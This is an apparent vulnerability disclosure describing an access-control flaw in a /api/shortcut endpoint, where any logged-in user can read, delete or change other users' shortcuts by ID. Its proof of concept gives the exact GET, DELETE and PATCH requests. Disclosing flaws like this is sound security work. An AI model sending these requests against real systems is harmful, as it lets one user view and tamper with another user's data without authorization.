# Description
Even if the endpoint /api/shortcut allow to see the list of your own shortcuts, it is possible to access, modify and delete other users shortcut accessing directly through the IDs.
# Proof of Concept
– Login with one user, and create a shortcut, let’s consider it now has the ID 1
– Login with another user
Now you are able to access to the shortcut with this:
“`
GET /api/shortcut/1 HTTP/1.1
Host: localhost:5230
“`
You can also delete it:
“`
DELETE /api/shortcut/1 HTTP/1.1
Host: localhost:5230
“`
And update it
“`
PATCH /api/shortcut/1 HTTP/1.1
Host: localhost:5230
{“id”:1,”title”:”changed 2″,”payload”:”[]”}
“`Read More